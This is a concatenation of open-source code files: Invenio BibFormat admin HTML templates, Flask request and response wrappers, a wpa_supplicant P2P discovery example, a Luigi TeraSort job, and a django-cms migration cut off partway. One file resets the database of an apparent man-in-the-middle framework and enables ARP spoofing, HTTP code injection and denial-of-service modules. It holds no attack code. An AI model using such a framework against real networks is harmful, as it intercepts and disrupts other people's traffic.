<td colspan="2" align="right"><input tabindex="%(tabindexbutton)s" class="adminbutton" type="submit" value="Update Output Format Attributes" %(disabled)s/></td>
</tr>
</table>
</form>
''' % {'description': description,
'tabindexdesc': i + 1,
'tabindexbutton': i + 2,
'readonly': readonly,
'disabled': disabled}
return out
def tmpl_admin_output_format_show_dependencies(self, ln, name, code, format_templates):
"""
Shows the dependencies of the given format.
@param ln: language
@param name: the name of the output format
@param code: the code of the output format
@param format_templates: format templates that depend on this format (and also elements and tags)
@return: HTML markup
"""
_ = gettext_set_language(ln) # load the right message language
out = '''
<table class="admin_wvar">
<tr><th colspan="4" class="adminheaderleft" cellspacing="0">%(menu)s</th></tr>
<tr>
<td>0. <small><a href="output_formats_manage?ln=%(ln)s">%(close_output_format)s</a></small> </td>
<td>1. <small><a href="output_format_show?ln=%(ln)s&bfo=%(code)s">%(rules)s</a></small> </td>
<td>2. <small><a href="output_format_show_attributes?ln=%(ln)s&bfo=%(code)s">%(modify_output_format_attributes)s</a></small> </td>
<td>3. <small>%(check_dependencies)s</small> </td>
</tr>
</table><br/>
<table width="90%%" class="admin_wvar" cellspacing="0"><tr>
<th class="adminheaderleft">Format Templates that use %(name)s</th>
<th class="adminheaderleft">Format Elements used by %(name)s</th>
<th class="adminheaderleft">Tags Called*</th>
</tr>
''' % {'name': name,
'code': code,
'ln': ln,
'close_output_format': _("Close Output Format"),
'rules': _("Rules"),
'modify_output_format_attributes': _("Modify Output Format Attributes"),
'check_dependencies': _("Check Dependencies"),
'menu': _("Menu")
}
if len(format_templates) == 0:
out += '''<tr><td colspan="3"><p align="center">
<i>This output format uses no format template.</i></p></td></tr>'''
for format_template in format_templates:
name = format_template['name']
filename = format_template['filename']
out += '''<tr><td><a href="format_template_show?bft=%(filename)s&ln=%(ln)s">%(name)s</a></td>
<td> </td><td> </td></tr>''' % {'filename': filename,
'name': name,
'ln': ln}
for format_element in format_template['elements']:
name = format_element['name']
filename = format_element['filename']
out += '''<tr><td> </td>
<td><a href="format_elements_doc?ln=%(ln)s#%(anchor)s">%(name)s</a></td>
<td> </td></tr>''' % {'anchor': name.upper(),
'name': name,
'ln': ln}
for tag in format_element['tags']:
out += '''<tr><td> </td><td> </td>
<td>%(tag)s</td></tr>''' % {'tag': tag}
out += '''
</table>
<b>*Note</b>: Some tags linked with this format template might not be shown. Check manually.
'''
return out
def tmpl_admin_format_elements_documentation(self, ln, format_elements):
"""
Returns the main management console for format elements. Includes list of formats elements and
associated administration tools.
@param ln: language
@param format_elements: a list of dictionaries with formats elements attributes
@return: main management console as html
"""
_ = gettext_set_language(ln) # load the right message language
#top of the page and table header
out = '''
<table class="admin_wvar" cellspacing="0">
<tr><th colspan="4" class="adminheaderleft">%(menu)s</th></tr>
<tr>
<td>0. <small><a href="format_templates_manage?ln=%(ln)s">%(manage_format_templates)s</a></small> </td>
<td>1. <small><a href="output_formats_manage?ln=%(ln)s">%(manage_output_formats)s</a></small> </td>
<td>2. <small>%(format_elements_documentation)s</small> </td>
</tr>
</table>
<p>Here you can read the APIs of the formats elements, the elementary bricks for formats.</p>
''' % {'ln': ln,
'menu': _("Menu"),
'manage_output_formats': _("Manage Output Formats"),
'manage_format_templates': _("Manage Format Templates"),
'format_elements_documentation': _("Format Elements Documentation"),
}
#table content: formats names, description and actions
if len(format_elements) == 0:
out += '''
<em>No format elements found</em>
'''
else:
#Print summary of elements (name + decription)
out += '''<h2>Summary table of elements</h2>'''
out += '''<table width="90%">'''
for format_element in format_elements:
format_attributes = format_element['attrs']
out += '''
<tr>
<td>
<code><a href="#%(name)s"><BFE_%(name)s/></a></code>
</td>
<td>
%(description)s
</td>
</tr>
''' % format_attributes
out += "</table>"
#Print details of elements
out += '''<h2>Details of elements</h2>'''
for format_element in format_elements:
format_attributes = format_element['attrs']
element_name = format_attributes['name']
out += self.tmpl_admin_print_format_element_documentation(ln, element_name, format_attributes)
#table footer, buttons and bottom of the page
out += '''
<table align="center" width="95%">
</table>'''
return out
def tmpl_admin_print_format_element_documentation(self, ln, name, attributes, print_see_also=True):
"""
Prints the formatted documentation of a single element. Used in main documentation of element and
in creation of floater for Dreamweaver.
@param ln: language
@param name: the name of the element
@param attributes: the attributes of the element, as returned by get_format_element_attrs_from_*
@param print_see_also: if True, prints links to other sections related to element
@return: HTML markup
"""
params_names = ""
for param in attributes['params']:
params_names += "<b>"+param['name'] +'</b>="..." '
out = '''
<a name="%(name)s"></a><h3>%(name)s</h3>
<b><BFE_%(name)s</b> %(params_names)s<b>/></b><br/><br/>
<em>%(description)s.</em><br/><br/>
<b>Parameters:</b><br/>
''' % {'params_names': params_names,
'name': name,
'description': attributes['description']}
for param in attributes['params']:
out += '''
<code>%(name)s</code> - %(description)s. ''' % param
if param['default'] != "":
default = cgi.escape(str(param['default']))
if default.strip() == "":
default = " "
out += '''
Default value is «<code>%s</code>»
''' % default
out += '<br/>'
for param in attributes['builtin_params']:
out += '''
<code>%(name)s</code> - %(description)s. ''' % param
if param['default'] != "":
default = cgi.escape(str(param['default']))
if default.strip() == "":
default = " "
out += '''
Default value is «<code>%s</code>»
''' % default
out += '<br/>'
if print_see_also:
out += '''<br/>
<b>See also:</b><br/>'''
for element in attributes['seealso']:
element_name = element.split('.')[0].upper()
out += '''
<a href="#%(name)s">Element <em>%(name)s</em></a><br/>''' % {'name': element_name}
out += '''
<a href ="format_element_show_dependencies?ln=%(ln)s&bfe=%(bfe)s">Dependencies of this element</a><br/>
<a href ="validate_format?ln=%(ln)s&bfe=%(bfe)s">The correctness of this element</a><br/>
<a href ="format_element_test?ln=%(ln)s&bfe=%(bfe)s">Test this element</a><br/>
''' % {'ln': ln, 'bfe': name}
return out
def tmpl_admin_format_element_show_dependencies(self, ln, name, format_templates, tags):
"""
Shows the dependencies of the given format element
@param ln: language
@param name: the name of the element
@param format_templates: format templates that depend on this element
@param tags: the tags that are called by this format element
@return: HTML markup
"""
out = '''
<p>Go back to <a href="format_elements_doc?ln=%(ln)s#%(name)s">documentation</a></p>
''' % {'ln': ln, 'name': name.upper()}
out += ''' <table width="90%" class="admin_wvar" cellspacing="0"><tr>'''
out += '''
<th class="adminheaderleft">Format Templates that use %(name)s</th>
<th class="adminheaderleft">Tags Called*</th>
</tr>
<tr>
<td> <br/>''' % {"name": name}
#Print format elements (and tags)
if len(format_templates) == 0:
out += '''<p align="center">
<i>This format element is not used in any format template.</i></p>'''
for format_template in format_templates:
name = format_template['name']
filename = format_template['filename']
out += '''<a href="format_template_show?ln=%(ln)s&bft=%(filename)s">%(name)s</a><br/>''' % {'filename': filename,
'name': name,
'ln': ln}
#Print tags
out += "</td><td> <br/>"
if len(tags) == 0:
out += '''<p align="center">
<i>This format element uses no tag.</i></p>'''
for tag in tags:
out += '''%(tag)s<br/>''' % {'tag': tag}
out += '''
</td>
</tr>
</table>
<b>*Note</b>: Some tags linked with this format template might not be shown. Check manually.
'''
return out
def tmpl_admin_format_element_test(self, ln, bfe, description, param_names, param_values, param_descriptions, result):
"""
Prints a page where the user can test the given format element with his own parameters.
@param ln: language
@param bfe: the format element name
@param description: a description of the element
@param param_names: a list of parameters names/labels
@param param_values: a list of values for parameters
@param param_descriptions: a list of description for parameters
@param result: the result of the evaluation
@return: HTML markup
"""
out = '''
<p>Go back to <a href="format_elements_doc?ln=%(ln)s#%(name)s">documentation</a></p>
''' % {'ln': ln, 'name': bfe.upper()}
out += '''
<h3><BFE_%(bfe)s /></h3>
<p>%(description)s</p>
<table width="100%%"><tr><td>
<form method="post" action="format_element_test?ln=%(ln)s&bfe=%(bfe)s">
<table>
''' % {'bfe': bfe, 'ln': ln, 'description': description}
for i in range(len(param_names)):
out += '''
<tr>
<td class="admintdright">%(name)s</td>
<td class="admintdright"><input type="text" name="param_values" value="%(value)s"/></td>
<td class="admintdleft">%(description)s </td>
</tr>
''' % {'name': cgi.escape(param_names[i]),
'value': cgi.escape(param_values[i], quote=True),
'description': param_descriptions[i]}
out += '''
<tr><td colspan="2" class="admintdright"><input type="submit" class="adminbutton" value="Test!"/></td>
<td> </td>
</tr>
</table>
</form>
<fieldset style="display:inline;margin-left:auto;margin-right:auto;">
<legend>Result:</legend>%(result)s</fieldset>
''' % {'result': result}
out += '''
</td></tr><tr><td>
'''
#out += self.tmpl_admin_print_format_element_documentation(ln, bfe, attributes, False)
out += '''</td></tr></table>'''
return out
def tmpl_admin_add_format_element(self, ln):
"""
Shows how to add a format element (mainly doc)
@param ln: language
@return: HTML markup
"""
_ = gettext_set_language(ln) # load the right message language
out = '''
<p>To add a new basic element (only fetch the value of a field, without special post-processing), go to the <a href="%(siteurl)sadmin/bibindex/bibindexadmin.py/field">BibEdit "Manage Logical Fields"</a> page and add a name for a field. Make sure that the name is unique and corresponds well to the field. For example, to add an element that fetch the value of field 245__%%, add a new logical field with name "title" and field "245__%%". Then in your template, call BFE_TITLE to print the title.</p>
<p>To add a new complex element (for eg. special formatting of the field, condition on the value, etc.) you must go to the lib/python/invenio/bibformat_elements directory of your Invenio installation, and add a new format element file. Read documentation for more information.</p>
''' % {'siteurl': CFG_SITE_URL}
return out
def tmpl_dreamweaver_floater(self, ln, format_elements):
"""
Returns the content of the BibFormat palette for Dreamweaver. This
'floater' will let users of Dreamweaver to insert Format elements
into their code right from the floater.
@param ln: language
@param format_elements: an ordered list of format elements structures as returned by get_format_elements
@return: HTML markup (according to Dreamweaver specs)
"""
names_list = [] # list of element names such as ['Authors', 'Title']
codes_list = [] # list of element code such as ['<BFE_AUTHORS limit="" separator="," />', '<BFE_TITLE />']
docs_list = [] # list of HTML doc for each element
for format_element in format_elements:
format_attributes = format_element['attrs']
name = format_attributes['name']
#description = format_attributes['description']
params = [x['name'] + '="'+str(x['default'])+'"' for x in format_attributes['params']]
builtin_params = [x['name'] + '="'+str(x['default'])+'"' for x in format_attributes['builtin_params']]
code = ("<BFE_" + name + ' ' + ' '.join(builtin_params)+ ' ' + ' '.join(params) +"/>").replace("'", r"\'")
doc = self.tmpl_admin_print_format_element_documentation(ln, name, format_attributes, print_see_also=False).replace("'", r"\'")
names_list.append(name)
codes_list.append(code)
docs_list.append(doc)
out = '''
<!DOCTYPE HTML SYSTEM "-//Macromedia//DWExtension layout-engine5.0//floater">
<html>
<head>
<!-- This file is to be used as floating panel for Dreamweaver.
To install, drag and drop inside /Configuration/Floaters of your Dreamweaver
application directory. You also have to enable a menu to open the floater:
Edit file Menu.xml located inside /Configuration/Menus of your Dreamweaver
application directory and copy-paste the following line in the menu you want
(typically inside tag 'menu' with attribute id = 'DWMenu_Window_Others'):
<menuitem name="BibFormat Elements" enabled="true" command="dw.toggleFloater('BibFormat_floater.html')" checked="dw.getFloaterVisibility('BibFormat_floater.html')" />
-->
<title>BibFormat Elements</title>
<script language="JavaScript">
var docs = new Array(%(docs)s);
var codes = new Array(%(codes)s);
function selectionChanged(){
// get the selected node
var theDOM = dw.getDocumentDOM();
var theNode = theDOM.getSelectedNode();
// check if node is a BibFormat Element
if (theNode.nodeType == Node.COMMENT_NODE && theNode.data.length >= 5 && theNode.data.toLowerCase().substring(0,5) == "<bfe_"){
var names = document.elementsList.options;
for (i=0;i<names.length; i++){
if (names[i].text.toLowerCase() == theNode.data.split(' ')[0].toLowerCase() ||
names[i].text.toLowerCase() == theNode.data.split(' ')[0].toLowerCase().substring(5,theNode.data.length)){
document.elementsList.selectedIndex = i;
selectElement(document.elementsList);
return;
}
}
}
}
function isAvailableInCodeView(){
return true;
}
function selectElement(elementsList){
document.infoBFE.innerHTML = docs[elementsList.selectedIndex];
}
function insertElement(){
// insert selection into code
var element_code = codes[document.elementsList.selectedIndex];
// get the DOM
var theDOM = dw.getDocumentDOM();
var theDocEl = theDOM.documentElement;
var theWholeDoc = theDocEl.outerHTML;
// Get the offsets of the selection
var theSel = theDOM.getSelection();
theDocEl.outerHTML = theWholeDoc.substring(0,theSel[0]) + element_code + theWholeDoc.substring(theSel[1]);
}
</script>
</head>
<body>
<table width="100%%" border="0" cellspacing="0" cellpadding="3">
<tr>
<td valign="top">
<select name="elementsList" id="elementsList" size="15" onChange="selectElement(this)">
%(names)s
</select><br/>
<input type="submit" name="Submit" value="Insert" onClick="insertElement()">
</td>
<td valign="top" width="100%%">
<div id="infoBFE">
<center>No Format Element selected. Select one from the list on the right.</center>
</div>
</td>
</tr>
</table>
</body>
</html>
''' % {'docs': ', '.join(["'"+x+"'" for x in docs_list]).replace('\n', '\\n'),
'codes': ', '.join(["'"+x+"'" for x in codes_list]).replace('\n', '\\n'),
'names': '\n'.join(['<option value="'+x+'">'+x+'</option>' for x in names_list])}
return out
def tmpl_admin_validate_format(self, ln, errors):
"""
Prints the errors of the validation of a format (might be any
kind of format)
@param ln: language
@param errors: a list of tuples (error code, string error message)
@return: HTML markup
"""
_ = gettext_set_language(ln) # load the right message language
out = ""
if len(errors) == 0:
out += '''<span style="color: rgb(0, 255, 0);" >%s.</span>''' % _('No problem found with format')
elif len(errors) == 1:
out += '''<span style="color: rgb(255, 0, 0);" >%s:</span><br/>''' % _('An error has been found')
else:
out += '''<span style="color: rgb(255, 0, 0);" >%s:</span><br/>''' % _('The following errors have been found')
for error in errors:
out += error + "<br/>"
return out
def tmpl_admin_dialog_box(self, url, title, message, options):
"""
Prints a dialog box with given title, message and options
@param url: the url of the page that must process the result of the dialog box
@param ln: language
@param title: the title of the dialog box
@param message: a formatted message to display inside dialog box
@param options: a list of string options to display as button to the user
@return: HTML markup
"""
out = ""
out += '''
<div style="text-align:center;">
<fieldset style="display:inline;margin-left:auto;margin-right:auto;">
<legend>%(title)s:</legend>
<p>%(message)s</p>
<form method="post" action="%(url)s">
''' % {'title': title,
'message': message,
'url': url}
for option in options:
out += '''<input type="submit" class="adminbutton" name="chosen_option" value="%(value)s" /> ''' % {'value': option}
out += '''</form></fieldset></div>'''
return out
|
gpl-2.0
|
claudio-idra/subterfuge
|
dbconfigure.py
|
22
|
1470
|
#####################################################################
#This file is for use to fully reset the Subterfuge Database
#It should only be necessary due to significant develompent changes
#Usage MUST be as follows:
#rm db && rm base_db
#./manage.py syncdb
#python dbconfigure.py
#This will rebuild the Database from scratch
#####################################################################
import os
from django.conf import settings
settings.configure(DATABASE_ENGINE="sqlite3",
DATABASE_HOST="",
DATABASE_NAME="db",
DATABASE_USER="",
DATABASE_PASSWORD="")
from django.db import models
from main.models import *
from modules.models import *
#Create Settings Data Space
table = setup(autoconf = "no")
table.save()
#Build Default Settings
print "Setting Database Default Configuration..."
setup.objects.update(autoconf = "yes")
setup.objects.update(ploadrate = "3")
setup.objects.update(injectrate = "6")
setup.objects.update(arprate = "8")
setup.objects.update(smartarp = "yes")
#Build Netview Module
print "Configuring Database Space for Modules..."
print "Building HTTP Code Injection Module"
newmod = installed(name = "httpcodeinjection")
newmod.save()
print "Building Tunnel Block Module"
newmod = installed(name = "tunnelblock")
newmod.save()
print "Building Denial of Service Module"
newmod = installed(name = "dos")
newmod.save()
|
gpl-3.0
|
emrecamasuvi/appengineTmp
|
lib/flask/wrappers.py
|
773
|
6709
|
# -*- coding: utf-8 -*-
"""
flask.wrappers
~~~~~~~~~~~~~~
Implements the WSGI wrappers (request and response).
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from werkzeug.wrappers import Request as RequestBase, Response as ResponseBase
from werkzeug.exceptions import BadRequest
from .debughelpers import attach_enctype_error_multidict
from . import json
from .globals import _request_ctx_stack
_missing = object()
def _get_data(req, cache):
getter = getattr(req, 'get_data', None)
if getter is not None:
return getter(cache=cache)
return req.data
class Request(RequestBase):
"""The request object used by default in Flask. Remembers the
matched endpoint and view arguments.
It is what ends up as :class:`~flask.request`. If you want to replace
the request object used you can subclass this and set
:attr:`~flask.Flask.request_class` to your subclass.
The request object is a :class:`~werkzeug.wrappers.Request` subclass and
provides all of the attributes Werkzeug defines plus a few Flask
specific ones.
"""
#: the internal URL rule that matched the request. This can be
#: useful to inspect which methods are allowed for the URL from
#: a before/after handler (``request.url_rule.methods``) etc.
#:
#: .. versionadded:: 0.6
url_rule = None
#: a dict of view arguments that matched the request. If an exception
#: happened when matching, this will be `None`.
view_args = None
#: if matching the URL failed, this is the exception that will be
#: raised / was raised as part of the request handling. This is
#: usually a :exc:`~werkzeug.exceptions.NotFound` exception or
#: something similar.
routing_exception = None
# switched by the request context until 1.0 to opt in deprecated
# module functionality
_is_old_module = False
@property
def max_content_length(self):
"""Read-only view of the `MAX_CONTENT_LENGTH` config key."""
ctx = _request_ctx_stack.top
if ctx is not None:
return ctx.app.config['MAX_CONTENT_LENGTH']
@property
def endpoint(self):
"""The endpoint that matched the request. This in combination with
:attr:`view_args` can be used to reconstruct the same or a
modified URL. If an exception happened when matching, this will
be `None`.
"""
if self.url_rule is not None:
return self.url_rule.endpoint
@property
def module(self):
"""The name of the current module if the request was dispatched
to an actual module. This is deprecated functionality, use blueprints
instead.
"""
from warnings import warn
warn(DeprecationWarning('modules were deprecated in favor of '
'blueprints. Use request.blueprint '
'instead.'), stacklevel=2)
if self._is_old_module:
return self.blueprint
@property
def blueprint(self):
"""The name of the current blueprint"""
if self.url_rule and '.' in self.url_rule.endpoint:
return self.url_rule.endpoint.rsplit('.', 1)[0]
@property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data. Otherwise this will be `None`.
The :meth:`get_json` method should be used instead.
"""
# XXX: deprecate property
return self.get_json()
def get_json(self, force=False, silent=False, cache=True):
"""Parses the incoming JSON request data and returns it. If
parsing fails the :meth:`on_json_loading_failed` method on the
request object will be invoked. By default this function will
only load the json data if the mimetype is ``application/json``
but this can be overriden by the `force` parameter.
:param force: if set to `True` the mimetype is ignored.
:param silent: if set to `False` this method will fail silently
and return `False`.
:param cache: if set to `True` the parsed JSON data is remembered
on the request.
"""
rv = getattr(self, '_cached_json', _missing)
if rv is not _missing:
return rv
if self.mimetype != 'application/json' and not force:
return None
# We accept a request charset against the specification as
# certain clients have been using this in the past. This
# fits our general approach of being nice in what we accept
# and strict in what we send out.
request_charset = self.mimetype_params.get('charset')
try:
data = _get_data(self, cache)
if request_charset is not None:
rv = json.loads(data, encoding=request_charset)
else:
rv = json.loads(data)
except ValueError as e:
if silent:
rv = None
else:
rv = self.on_json_loading_failed(e)
if cache:
self._cached_json = rv
return rv
def on_json_loading_failed(self, e):
"""Called if decoding of the JSON data failed. The return value of
this method is used by :meth:`get_json` when an error occurred. The
default implementation just raises a :class:`BadRequest` exception.
.. versionchanged:: 0.10
Removed buggy previous behavior of generating a random JSON
response. If you want that behavior back you can trivially
add it by subclassing.
.. versionadded:: 0.8
"""
raise BadRequest()
def _load_form_data(self):
RequestBase._load_form_data(self)
# in debug mode we're replacing the files multidict with an ad-hoc
# subclass that raises a different error for key errors.
ctx = _request_ctx_stack.top
if ctx is not None and ctx.app.debug and \
self.mimetype != 'multipart/form-data' and not self.files:
attach_enctype_error_multidict(self)
class Response(ResponseBase):
"""The response object that is used by default in Flask. Works like the
response object from Werkzeug but is set to have an HTML mimetype by
default. Quite often you don't have to create this object yourself because
:meth:`~flask.Flask.make_response` will take care of that for you.
If you want to replace the response object used you can subclass this and
set :attr:`~flask.Flask.response_class` to your subclass.
"""
default_mimetype = 'text/html'
|
apache-2.0
|
execunix/vinos
|
external/bsd/wpa/dist/wpa_supplicant/examples/p2p/p2p_find.py
|
29
|
4714
|
#!/usr/bin/python
# Tests p2p_find
# Will list all devices found/lost within a time frame (timeout)
# Then Program will exit
######### MAY NEED TO RUN AS SUDO #############
import dbus
import sys, os
import time
import gobject
import threading
import getopt
from dbus.mainloop.glib import DBusGMainLoop
def usage():
print "Usage:"
print " %s -i <interface_name> [-t <timeout>] \ " \
% sys.argv[0]
print " [-w <wpas_dbus_interface>]"
print "Options:"
print " -i = interface name"
print " -t = timeout = 0s (infinite)"
print " -w = wpas dbus interface = fi.w1.wpa_supplicant1"
print "Example:"
print " %s -i wlan0 -t 10" % sys.argv[0]
# Required Signals
def deviceFound(devicepath):
print "Device found: %s" % (devicepath)
def deviceLost(devicepath):
print "Device lost: %s" % (devicepath)
class P2P_Find (threading.Thread):
# Needed Variables
global bus
global wpas_object
global interface_object
global p2p_interface
global interface_name
global wpas
global wpas_dbus_interface
global timeout
global path
# Dbus Paths
global wpas_dbus_opath
global wpas_dbus_interfaces_opath
global wpas_dbus_interfaces_interface
global wpas_dbus_interfaces_p2pdevice
# Constructor
def __init__(self,interface_name,wpas_dbus_interface,timeout):
# Initializes variables and threads
self.timeout = int(timeout)
self.interface_name = interface_name
self.wpas_dbus_interface = wpas_dbus_interface
# Initializes thread and daemon allows for ctrl-c kill
threading.Thread.__init__(self)
self.daemon = True
# Generating interface/object paths
self.wpas_dbus_opath = "/" + \
self.wpas_dbus_interface.replace(".","/")
self.wpas_wpas_dbus_interfaces_opath = self.wpas_dbus_opath + \
"/Interfaces"
self.wpas_dbus_interfaces_interface = \
self.wpas_dbus_interface + ".Interface"
self.wpas_dbus_interfaces_p2pdevice = \
self.wpas_dbus_interfaces_interface \
+ ".P2PDevice"
# Getting interfaces and objects
DBusGMainLoop(set_as_default=True)
self.bus = dbus.SystemBus()
self.wpas_object = self.bus.get_object(
self.wpas_dbus_interface,
self.wpas_dbus_opath)
self.wpas = dbus.Interface(self.wpas_object,
self.wpas_dbus_interface)
# Try to see if supplicant knows about interface
# If not, throw an exception
try:
self.path = self.wpas.GetInterface(
self.interface_name)
except dbus.DBusException, exc:
error = 'Error:\n Interface ' + self.interface_name \
+ ' was not found'
print error
usage()
os._exit(0)
self.interface_object = self.bus.get_object(
self.wpas_dbus_interface, self.path)
self.p2p_interface = dbus.Interface(self.interface_object,
self.wpas_dbus_interfaces_p2pdevice)
#Adds listeners for find and lost
self.bus.add_signal_receiver(deviceFound,
dbus_interface=self.wpas_dbus_interfaces_p2pdevice,
signal_name="DeviceFound")
self.bus.add_signal_receiver(deviceLost,
dbus_interface=self.wpas_dbus_interfaces_p2pdevice,
signal_name="DeviceLost")
# Sets up p2p_find
P2PFindDict = dbus.Dictionary(
{'Timeout':int(self.timeout)})
self.p2p_interface.Find(P2PFindDict)
# Run p2p_find
def run(self):
# Allows other threads to keep working while MainLoop runs
# Required for timeout implementation
gobject.MainLoop().get_context().iteration(True)
gobject.threads_init()
gobject.MainLoop().run()
if __name__ == "__main__":
# Defaults for optional inputs
timeout = 0
wpas_dbus_interface = 'fi.w1.wpa_supplicant1'
# interface_name is required
interface_name = None
# Using getopts to handle options
try:
options, args = getopt.getopt(sys.argv[1:],"hi:t:w:")
except getopt.GetoptError:
usage()
quit()
# If theres a switch, override default option
for key, value in options:
# Help
if (key == "-h"):
usage()
quit()
# Interface Name
elif (key == "-i"):
interface_name = value
# Timeout
elif (key == "-t"):
if ( int(value) >= 0):
timeout = value
else:
print "Error:\n Timeout cannot be negative"
usage()
quit()
# Dbus interface
elif (key == "-w"):
wpas_dbus_interface = value
else:
assert False, "unhandled option"
# Interface name is required and was not given
if (interface_name == None):
print "Error:\n interface_name is required"
usage()
quit()
# Constructor
try:
p2p_find_test = P2P_Find(interface_name, wpas_dbus_interface, timeout)
except:
print "Error:\n Invalid wpas_dbus_interface"
usage()
quit()
# Start P2P_Find
p2p_find_test.start()
try:
# If timeout is 0, then run forever
if (timeout == 0):
while(True):
pass
# Else sleep for (timeout)
else:
time.sleep(p2p_find_test.timeout)
except:
pass
quit()
|
apache-2.0
|
moandcompany/luigi
|
examples/terasort.py
|
59
|
3445
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import os
import luigi
import luigi.contrib.hadoop_jar
import luigi.contrib.hdfs
logger = logging.getLogger('luigi-interface')
def hadoop_examples_jar():
config = luigi.configuration.get_config()
examples_jar = config.get('hadoop', 'examples-jar')
if not examples_jar:
logger.error("You must specify hadoop:examples-jar in luigi.cfg")
raise
if not os.path.exists(examples_jar):
logger.error("Can't find example jar: " + examples_jar)
raise
return examples_jar
DEFAULT_TERASORT_IN = '/tmp/terasort-in'
DEFAULT_TERASORT_OUT = '/tmp/terasort-out'
class TeraGen(luigi.contrib.hadoop_jar.HadoopJarJobTask):
"""
Runs TeraGen, by default with 1TB of data (10B records)
"""
records = luigi.Parameter(default="10000000000",
description="Number of records, each record is 100 Bytes")
terasort_in = luigi.Parameter(default=DEFAULT_TERASORT_IN,
description="directory to store terasort input into.")
def output(self):
"""
Returns the target output for this task.
In this case, a successful execution of this task will create a file in HDFS.
:return: the target output for this task.
:rtype: object (:py:class:`~luigi.target.Target`)
"""
return luigi.contrib.hdfs.HdfsTarget(self.terasort_in)
def jar(self):
return hadoop_examples_jar()
def main(self):
return "teragen"
def args(self):
# First arg is 10B -- each record is 100bytes
return [self.records, self.output()]
class TeraSort(luigi.contrib.hadoop_jar.HadoopJarJobTask):
"""
Runs TeraGent, by default using
"""
terasort_in = luigi.Parameter(default=DEFAULT_TERASORT_IN,
description="directory to store terasort input into.")
terasort_out = luigi.Parameter(default=DEFAULT_TERASORT_OUT,
description="directory to store terasort output into.")
def requires(self):
"""
This task's dependencies:
* :py:class:`~.TeraGen`
:return: object (:py:class:`luigi.task.Task`)
"""
return TeraGen(terasort_in=self.terasort_in)
def output(self):
"""
Returns the target output for this task.
In this case, a successful execution of this task will create a file in HDFS.
:return: the target output for this task.
:rtype: object (:py:class:`~luigi.target.Target`)
"""
return luigi.contrib.hdfs.HdfsTarget(self.terasort_out)
def jar(self):
return hadoop_examples_jar()
def main(self):
return "terasort"
def args(self):
return [self.input(), self.output()]
if __name__ == '__main__':
luigi.run()
|
apache-2.0
|
intgr/django-cms
|
cms/migrations/0045_auto__add_field_page_application_urls.py
|
15
|
16500
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
try:
from django.contrib.auth import get_user_model
except ImportError: # django < 1.5
from django.contrib.auth.models import User
else:
User = get_user_model()
user_orm_label = '%s.%s' % (User._meta.app_label, User._meta.object_name)
user_model_label = '%s.%s' % (User._meta.app_label, User._meta.module_name)
user_ptr_name = '%s_ptr' % User._meta.object_name.lower()
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Page.application_urls'
db.add_column(u'cms_page', 'application_urls',
self.gf('django.db.models.fields.CharField')(db_index=True, max_length=200, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Page.application_urls'
db.delete_column(u'cms_page', 'application_urls')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
user_model_label: {
'Meta': {'object_name': User.__name__, 'db_table': "'%s'" % User._meta.db_table},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'cms.cmsplugin': {
'Meta': {'object_name': 'CMSPlugin'},
'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.CMSPlugin']", 'null': 'True', 'blank': 'True'}),
'placeholder': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
'plugin_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
